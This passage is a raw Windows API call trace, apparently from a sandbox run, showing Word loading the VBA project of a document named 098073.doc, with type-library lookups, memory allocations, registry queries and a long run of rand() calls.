[2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e61a8 | out: ppvObject=0x2e61a8*=0x0) returned 0x80004002 [0029.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x2e6170, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0029.896] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA") returned 0x10e2f7 [0029.896] IUnknown:Release (This=0x782a220) returned 0x2 [0029.896] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0x777fbc0 [0029.896] IMalloc:GetSize (This=0x7fefe015380, pv=0x777fbc0) returned 0x0 [0029.896] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0x777fbd0 [0029.896] IMalloc:GetSize (This=0x7fefe015380, pv=0x777fbd0) returned 0x0 [0029.896] VirtualQuery (in: lpAddress=0x2e6750, lpBuffer=0x2e6710, dwLength=0x30 | out: lpBuffer=0x2e6710*(BaseAddress=0x2e6000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0xa000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0029.896] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0x777fbe0 [0029.896] qsort (in: _Base=0x777fbe0, _NumOfElements=0x0, _SizeOfElements=0x10, _PtFuncCompare=0x7fee383db70 | out: _Base=0x777fbe0) [0029.920] IMalloc:Free (This=0x7fefe015380, pv=0x777fbe0) [0029.920] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0x774bbe0 [0029.920] IMalloc:Alloc (This=0x7fefe015380, cb=0xc) returned 0x774bd20 [0029.920] IMalloc:GetSize (This=0x7fefe015380, pv=0x774bd20) returned 0xc [0029.920] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win16") returned 0x107ec1 [0029.920] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win32") returned 0x107f07 [0029.920] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win64") returned 0x107f78 [0029.920] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mac") returned 0x10b2b3 [0029.920] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA6") returned 0x1023ad [0029.920] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA7") returned 0x1023ae [0029.920] IMalloc:Free (This=0x7fefe015380, pv=0x777fbd0) [0029.920] IMalloc:Free (This=0x7fefe015380, pv=0x777fbc0) [0029.920] CoCreateGuid (in: pguid=0x2e6858 | out: pguid=0x2e6858*(Data1=0xcdd73c97, Data2=0x5211, Data3=0x423f, Data4=([0]=0xab, [1]=0xcb, [2]=0x5f, [3]=0xde, [4]=0xe0, [5]=0x3a, [6]=0x71, [7]=0x94))) returned 0x0 [0029.920] IMalloc:Alloc (This=0x7fefe015380, cb=0x6b0) returned 0xb40de70 [0029.921] srand (_Seed=0x5196) [0029.921] rand () returned 2707 [0029.921] rand () returned 5367 [0029.921] rand () returned 3107 [0029.921] rand () returned 25991 [0029.921] rand () returned 22224 [0029.921] rand () returned 7173 [0029.921] rand () returned 3305 [0029.921] rand () returned 5542 [0029.921] rand () returned 21093 [0029.921] rand () returned 7093 [0029.921] rand () returned 29645 [0029.921] rand () returned 30555 [0029.921] rand () returned 4452 [0029.921] rand () returned 15519 [0029.921] rand () returned 22682 [0029.921] rand () returned 20118 [0029.921] rand () returned 26125 [0029.921] rand () returned 28117 [0029.921] rand () returned 31912 [0029.921] rand () returned 27549 [0029.921] rand () returned 25247 [0029.921] rand () returned 12135 [0029.921] rand () returned 31572 [0029.921] rand () returned 27055 [0029.921] rand () returned 11630 [0029.921] rand () returned 26157 [0029.921] rand () returned 24237 [0029.921] rand () returned 16615 [0029.921] rand () returned 23350 [0029.921] rand () returned 7360 [0029.921] rand () returned 27760 [0029.921] rand () returned 12132 [0029.921] rand () returned 17327 [0029.921] rand () returned 21962 [0029.921] rand () returned 16183 [0029.921] rand () returned 15783 [0029.921] rand () returned 1121 [0029.921] rand () returned 21376 [0029.921] rand () returned 32749 [0029.921] rand () returned 25148 [0029.921] rand () returned 9658 [0029.921] rand () returned 30828 [0029.921] rand () returned 21381 [0029.921] rand () returned 2205 [0029.921] rand () returned 5726 [0029.921] rand () returned 9584 [0029.921] rand () returned 20715 [0029.921] rand () returned 32595 [0029.921] rand () returned 28862 [0029.921] rand () returned 14600 [0029.921] rand () returned 4923 [0029.921] rand () returned 4446 [0029.921] rand () returned 16108 [0029.921] rand () returned 5071 [0029.921] rand () returned 15410 [0029.921] rand () returned 20183 [0029.921] rand () returned 12462 [0029.921] rand () returned 17989 [0029.922] rand () returned 31458 [0029.922] rand () returned 18644 [0029.922] rand () returned 30673 [0029.922] rand () returned 19407 [0029.922] rand () returned 27305 [0029.922] rand () returned 17548 [0029.922] rand () returned 16063 [0029.922] rand () returned 30463 [0029.922] rand () returned 24163 [0029.922] rand () returned 10684 [0029.922] rand () returned 27988 [0029.922] rand () returned 29462 [0029.922] rand () returned 27615 [0029.922] rand () returned 12361 [0029.922] rand () returned 12270 [0029.922] rand () returned 32455 [0029.922] rand () returned 19344 [0029.922] rand () returned 4390 [0029.922] rand () returned 29891 [0029.922] rand () returned 17470 [0029.922] rand () returned 24709 [0029.922] rand () returned 15992 [0029.922] rand () returned 21368 [0029.922] rand () returned 29281 [0029.922] rand () returned 31899 [0029.922] rand () returned 26360 [0029.922] rand () returned 4847 [0029.922] rand () returned 31574 [0029.922] rand () returned 13554 [0029.922] rand () returned 18585 [0029.922] rand () returned 16736 [0029.922] rand () returned 7237 [0029.922] rand () returned 23197 [0029.922] rand () returned 5740 [0029.922] rand () returned 4779 [0029.922] rand () returned 4703 [0029.922] rand () returned 27550 [0029.922] rand () returned 30144 [0029.922] rand () returned 30956 [0029.922] rand () returned 8479 [0029.922] rand () returned 4113 [0029.922] rand () returned 22157 [0029.922] rand () returned 11088 [0029.922] rand () returned 19919 [0029.922] rand () returned 30631 [0029.922] rand () returned 11027 [0029.922] rand () returned 3880 [0029.922] rand () returned 29775 [0029.922] rand () returned 11094 [0029.922] rand () returned 17086 [0029.922] rand () returned 14140 [0029.922] rand () returned 6418 [0029.922] rand () returned 10063 [0029.922] rand () returned 19533 [0029.922] rand () returned 28002 [0029.922] rand () returned 7273 [0029.922] rand () returned 20785 [0029.922] rand () returned 17203 [0029.922] rand () returned 31311 [0029.922] rand () returned 13060 [0029.922] rand () returned 7804 [0029.922] rand () returned 19517 [0029.922] rand () returned 8108 [0029.922] rand () returned 18357 [0029.922] rand () returned 32584 [0029.922] rand () returned 17782 [0029.922] rand () returned 30829 [0029.922] rand () returned 10872 [0029.922] rand () returned 24887 [0029.922] rand () returned 3400 [0029.922] rand () returned 13150 [0029.922] rand () returned 12465 [0029.922] rand () returned 24232 [0029.922] rand () returned 17635 [0029.922] rand () returned 23550 [0029.923] rand () returned 10932 [0029.923] rand () returned 28205 [0029.923] rand () returned 4579 [0029.923] rand () returned 9617 [0029.923] rand () returned 21130 [0029.923] rand () returned 9792 [0029.923] rand () returned 9004 [0029.923] rand () returned 27761 [0029.923] rand () returned 6131 [0029.923] rand () returned 26929 [0029.923] rand () returned 32025 [0029.923] rand () returned 24997 [0029.923] rand () returned 28071 [0029.923] rand () returned 3427 [0029.923] rand () returned 20695 [0029.923] rand () returned 5300 [0029.923] rand () returned 31713 [0029.923] rand () returned 21944 [0029.923] rand () returned 25355 [0029.923] rand () returned 20411 [0029.923] rand () returned 23582 [0029.923] rand () returned 20042 [0029.923] rand () returned 17851 [0029.923] rand () returned 31166 [0029.923] rand () returned 16930 [0029.923] rand () returned 24924 [0029.923] rand () returned 26987 [0029.923] rand () returned 29500 [0029.923] rand () returned 13885 [0029.923] rand () returned 14480 [0029.923] rand () returned 18822 [0029.923] rand () returned 8454 [0029.923] rand () returned 17612 [0029.923] rand () returned 15962 [0029.923] rand () returned 14336 [0029.923] rand () returned 6481 [0029.923] rand () returned 18178 [0029.923] rand () returned 21428 [0029.923] rand () returned 3130 [0029.923] rand () returned 9993 [0029.923] rand () returned 10473 [0029.923] rand () returned 3603 [0029.923] rand () returned 14630 [0029.923] rand () returned 5992 [0029.923] rand () returned 20643 [0029.923] rand () returned 4506 [0029.923] rand () returned 3755 [0029.923] rand () returned 1480 [0029.923] rand () returned 2806 [0029.923] rand () returned 23438 [0029.923] rand () returned 10827 [0029.923] rand () returned 6581 [0029.923] rand () returned 8456 [0029.923] rand () returned 4363 [0029.923] rand () returned 23299 [0029.923] rand () returned 27463 [0029.923] rand () returned 31590 [0029.923] rand () returned 9717 [0029.923] rand () returned 31858 [0029.923] rand () returned 430 [0029.923] rand () returned 30283 [0029.923] rand () returned 28720 [0029.923] rand () returned 3390 [0029.923] rand () returned 8207 [0029.923] rand () returned 19232 [0029.923] rand () returned 31508 [0029.923] rand () returned 1204 [0029.923] rand () returned 21647 [0029.923] rand () returned 13119 [0029.923] rand () returned 12059 [0029.923] rand () returned 11182 [0029.923] rand () returned 32173 [0029.923] rand () returned 10236 [0029.923] rand () returned 8669 [0029.923] rand () returned 31930 [0029.924] rand () returned 14804 [0029.924] rand () returned 25574 [0029.924] rand () returned 8767 [0029.924] rand () returned 20344 [0029.924] rand () returned 30000 [0029.924] rand () returned 2378 [0029.924] rand () returned 21735 [0029.924] rand () returned 21316 [0029.924] rand () returned 2498 [0029.924] rand () returned 4601 [0029.924] rand () returned 29939 [0029.924] rand () returned 7445 [0029.924] rand () returned 9647 [0029.924] rand () returned 27723 [0029.924] rand () returned 3306 [0029.924] rand () returned 19621 [0029.924] rand () returned 27614 [0029.924] rand () returned 26980 [0029.924] rand () returned 15346 [0029.924] rand () returned 3283 [0029.924] rand () returned 705 [0029.924] rand () returned 24758 [0029.924] rand () returned 23364 [0029.924] rand () returned 29509 [0029.924] rand () returned 1395 [0029.924] rand () returned 11463 [0029.924] rand () returned 6110 [0029.924] rand () returned 849 [0029.924] rand () returned 2820 [0029.924] rand () returned 25909 [0029.924] rand () returned 21623 [0029.924] rand () returned 22558 [0029.924] rand () returned 14353 [0029.924] rand () returned 31223 [0029.924] rand () returned 26552 [0029.924] rand () returned 14854 [0029.924] rand () returned 3735 [0029.924] rand () returned 5093 [0029.924] rand () returned 2729 [0029.924] rand () returned 9023 [0029.924] rand () returned 28680 [0029.924] CoCreateGuid (in: pguid=0x78012f8 | out: pguid=0x78012f8*(Data1=0x50c89a03, Data2=0x2269, Data3=0x4595, Data4=([0]=0x81, [1]=0x77, [2]=0xf6, [3]=0x2b, [4]=0x5a, [5]=0x20, [6]=0x70, [7]=0x9d))) returned 0x0 [0029.924] strcpy_s (in: _Dst=0x7801358, _DstSize=0x1, _Src="" | out: _Dst="") returned 0x0 [0029.924] CExposedDocFile::OpenStream () returned 0x0 [0029.924] CExposedStream::Read () returned 0x0 [0029.924] IMalloc:Alloc (This=0x7fefe015380, cb=0x2028) returned 0xb40e530 [0029.925] IMalloc:Alloc (This=0x7fefe015380, cb=0x10020*=0x10128) returned 0xb410560 [0029.925] CExposedStream::AddRef () returned 0x2 [0029.925] CExposedStream::Release () returned 0x1 [0029.925] CExposedStream::Read () returned 0x0 [0029.925] CExposedStream::Read () returned 0x0 [0029.961] CompareStringA (Locale=0x409, dwCmpFlags=0x3, lpString1="Test", cchCount1=-1, lpString2="Test", cchCount2=-1) returned 2 [0029.962] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x2e6854, cbMultiByte=2, lpWideCharStr=0x2e6868, cchWideChar=2 | out: lpWideCharStr="") returned 2 [0029.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=8, lpMultiByteStr=0x2e67e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0029.983] lstrcmpiA (lpString1="", lpString2="Project") returned -1 [0029.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0029.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x2e66e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0029.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project") returned 0x10ae2d [0029.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=8, lpMultiByteStr=0x2e65f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0029.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project") returned 0x10ae2d [0029.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=8, lpMultiByteStr=0x2e65f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0029.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=8, lpMultiByteStr=0x2e64b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0029.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project") returned 0x10ae2d [0029.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project") returned 0x10ae2d [0029.984] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0x774bd40 [0029.984] IMalloc:Free (This=0x7fefe015380, pv=0x766d110) [0029.984] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x766d110 [0029.984] IMalloc:Free (This=0x7fefe015380, pv=0x774bd40) [0029.985] strcpy_s (in: _Dst=0x7801368, _DstSize=0x8, _Src="Project" | out: _Dst="Project") returned 0x0 [0029.997] wcscpy_s (in: _Destination=0xb420850, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation") returned 0x0 [0029.997] wcsncpy_s (in: _Destination=0x2e6440, _SizeInWords=0x108, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation", _MaxCount=0x106 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation") returned 0x0 [0029.997] CharLowerBuffW (in: lpsz="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation", cchLength=0x5e | out: lpsz="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\syswow64\\stdole2.tlb#ole automation") returned 0x5e [0029.997] IMalloc:Alloc (This=0x7fefe015380, cb=0xbe) returned 0x7659850 [0029.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\syswow64\\stdole2.tlb#ole automation", cchWideChar=95, lpMultiByteStr=0x7659850, cbMultiByte=190, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\syswow64\\stdole2.tlb#ole automation", lpUsedDefaultChar=0x0) returned 95 [0029.997] IMalloc:Free (This=0x7fefe015380, pv=0x7659850) [0029.997] wcscpy_s (in: _Destination=0x54a0e58, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation") returned 0x0 [0029.997] wcsncpy_s (in: _Destination=0x2e6480, _SizeInWords=0x108, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation", _MaxCount=0x106 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation") returned 0x0 [0029.998] CharLowerBuffW (in: lpsz="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation", cchLength=0x5e | out: lpsz="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\syswow64\\stdole2.tlb#ole automation") returned 0x5e [0029.998] IMalloc:Alloc (This=0x7fefe015380, cb=0xbe) returned 0x7659850 [0029.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\syswow64\\stdole2.tlb#ole automation", cchWideChar=95, lpMultiByteStr=0x7659850, cbMultiByte=190, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\syswow64\\stdole2.tlb#ole automation", lpUsedDefaultChar=0x0) returned 95 [0029.998] IMalloc:Free (This=0x7fefe015380, pv=0x7659850) [0029.998] wcsncpy_s (in: _Destination=0x2e6440, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0x0 [0029.998] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", cchLength=0x27 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc") returned 0x27 [0029.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", cchWideChar=40, lpMultiByteStr=0x2e6370, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", lpUsedDefaultChar=0x0) returned 40 [0029.998] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0 [0029.998] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stdole") returned 0x106093 [0029.999] strcpy_s (in: _Dst=0x2e6500, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0029.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e6500, cbMultiByte=7, lpWideCharStr=0x2e6350, cchWideChar=7 | out: lpWideCharStr="stdole") returned 7 [0029.999] IUnknown:AddRef (This=0x782a220) returned 0x3 [0029.999] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="stdole", lHashVal=0x106093, pfName=0x2e6420, pBstrLibName=0x2e6350 | out: pfName=0x2e6420*=0, pBstrLibName=0x2e6350) returned 0x0 [0029.999] IUnknown:Release (This=0x782a220) returned 0x2 [0029.999] IUnknown:AddRef (This=0x731da90) returned 0x3 [0029.999] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="stdole", lHashVal=0x106093, pfName=0x2e6420, pBstrLibName=0x2e6350 | out: pfName=0x2e6420*=0, pBstrLibName=0x2e6350) returned 0x0 [0029.999] IUnknown:Release (This=0x731da90) returned 0x2 [0029.999] IMalloc:Alloc (This=0x7fefe015380, cb=0x208) returned 0x2d28370 [0030.000] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x2e5b00 | out: phkResult=0x2e5b00*=0xa16) returned 0x0 [0030.000] RegOpenKeyW (in: hKey=0xa16, lpSubKey="{00020430-0000-0000-C000-000000000046}", phkResult=0x2e5af8 | out: phkResult=0x2e5af8*=0xa26) returned 0x0 [0030.001] RegEnumKeyW (in: hKey=0xa26, dwIndex=0x0, lpName=0x2e5b28, cchName=0xa | out: lpName="1.0") returned 0x0 [0030.002] RegEnumKeyW (in: hKey=0xa26, dwIndex=0x1, lpName=0x2e5b28, cchName=0xa | out: lpName="2.0") returned 0x0 [0030.002] wcscpy_s (in: _Destination=0x2e5b10, _SizeInWords=0xa, _Source="2.0" | out: _Destination="2.0") returned 0x0 [0030.002] RegOpenKeyW (in: hKey=0xa26, lpSubKey="2.0", phkResult=0x2e5bb8 | out: phkResult=0x2e5bb8*=0xa1a) returned 0x0 [0030.003] _ultoa_s (in: _Val=0x0, _DstBuf=0x2e5b30, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0030.003] RegOpenKeyA (in: hKey=0xa1a, lpSubKey="0", phkResult=0x2e5b20 | out: phkResult=0x2e5b20*=0xa2a) returned 0x0 [0030.004] RegOpenKeyW (in: hKey=0xa2a, lpSubKey="win64", phkResult=0x2e5b28 | out: phkResult=0x2e5b28*=0xa2e) returned 0x0 [0030.004] RegCloseKey (hKey=0xa2e) returned 0x0 [0030.004] RegCloseKey (hKey=0xa2a) returned 0x0 [0030.005] _ultow_s (in: _Value=0x0, _Buffer=0x2e5bc0, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0030.005] RegOpenKeyW (in: hKey=0xa1a, lpSubKey="0", phkResult=0x2e5b98 | out: phkResult=0x2e5b98*=0xa2a) returned 0x0 [0030.005] RegQueryValueW (in: hKey=0xa2a, lpSubKey="win64", lpData=0x2e5be0, lpcbData=0x2e5b94 | out: lpData="C:\\Windows\\system32\\stdole2.tlb", lpcbData=0x2e5b94) returned 0x0 [0030.007] wcscpy_s (in: _Destination=0x2d28370, _SizeInWords=0x104, _Source="C:\\Windows\\system32\\stdole2.tlb" | out: _Destination="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0030.007] RegCloseKey (hKey=0xa2a) returned 0x0 [0030.007] RegCloseKey (hKey=0xa1a) returned 0x0 [0030.007] RegCloseKey (hKey=0xa26) returned 0x0 [0030.007] RegCloseKey (hKey=0xa16) returned 0x0 [0030.008] IUnknown:QueryInterface (in: This=0x731cc80, riid=0x7fee3a76290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6008 | out: ppvObject=0x2e6008*=0x0) returned 0x80004002 [0030.008] ITypeLib:RemoteGetLibAttr (in: This=0x731cc80, ppTLibAttr=0x2e6000, pDummy=0x10 | out: ppTLibAttr=0x2e6000, pDummy=0x10) returned 0x0 [0030.008] ITypeLib:RemoteGetDocumentation (in: This=0x731cc80, index=-1, refPtrFlags=0x0, pBstrName=0x2e5ff8, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x7784526 | out: pBstrName=0x2e5ff8*="OLE Automation", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x7784526) returned 0x0 [0030.008] StringFromGUID2 (in: rguid=0x766cf90*(Data1=0x20430, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x2e6020, cchMax=39 | out: lpsz="{00020430-0000-0000-C000-000000000046}") returned 39 [0030.008] _ultow_s (in: _Value=0x2, _Buffer=0x2e5f6a, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0030.008] _ultow_s (in: _Value=0x0, _Buffer=0x2e5f6e, _BufferCount=0xe, _Radix=16 | out: _Buffer="0") returned 0x0 [0030.008] _ultow_s (in: _Value=0x0, _Buffer=0x2e5f72, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0030.008] wcscpy_s (in: _Destination=0x77845a8, _SizeInWords=0x5f, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0030.008] wcscpy_s (in: _Destination=0x77845ae, _SizeInWords=0x5c, _Source="{00020430-0000-0000-C000-000000000046}" | out: _Destination="{00020430-0000-0000-C000-000000000046}") returned 0x0 [0030.008] wcscpy_s (in: _Destination=0x77845fa, _SizeInWords=0x36, _Source="#2.0#0#" | out: _Destination="#2.0#0#") returned 0x0 [0030.009] wcscpy_s (in: _Destination=0x7784608, _SizeInWords=0x2f, _Source="C:\\Windows\\system32\\stdole2.tlb" | out: _Destination="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0030.009] wcscpy_s (in: _Destination=0x7784648, _SizeInWords=0xf, _Source="OLE Automation" | out: _Destination="OLE Automation") returned 0x0 [0030.009] ITypeLib:LocalReleaseTLibAttr (This=0x731cc80) returned 0x0 [0030.009] wcscpy_s (in: _Destination=0xb420910, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0030.009] IMalloc:Free (This=0x7fefe015380, pv=0x2d28370) [0030.009] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="stdole", lHashVal=0x106093, pfName=0x2e6420, pBstrLibName=0x2e6350 | out: pfName=0x2e6420*=0, pBstrLibName=0x2e6350) returned 0x0 [0030.009] IUnknown:Release (This=0x731cc80) returned 0x4 [0030.009] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x766cab0 [0030.009] IMalloc:Free (This=0x7fefe015380, pv=0x7601ec0) [0030.009] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x766cae0 [0030.010] IMalloc:Free (This=0x7fefe015380, pv=0x766cab0) [0030.022] wcscpy_s (in: _Destination=0xb420878, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0030.022] wcsncpy_s (in: _Destination=0x2e6440, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0030.022] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0030.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x2e6370, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0030.022] wcscpy_s (in: _Destination=0x54a0f48, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0030.022] wcsncpy_s (in: _Destination=0x2e6480, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0030.022] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0030.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x2e63b0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0030.023] wcsncpy_s (in: _Destination=0x2e6440, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0x0 [0030.023] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", cchLength=0x27 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc") returned 0x27 [0030.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", cchWideChar=40, lpMultiByteStr=0x2e6370, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", lpUsedDefaultChar=0x0) returned 40 [0030.023] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0 [0030.023] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0030.023] strcpy_s (in: _Dst=0x2e6500, _DstSize=0x7, _Src="Normal" | out: _Dst="Normal") returned 0x0 [0030.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e6500, cbMultiByte=7, lpWideCharStr=0x2e6350, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0030.024] IUnknown:AddRef (This=0x782a220) returned 0x3 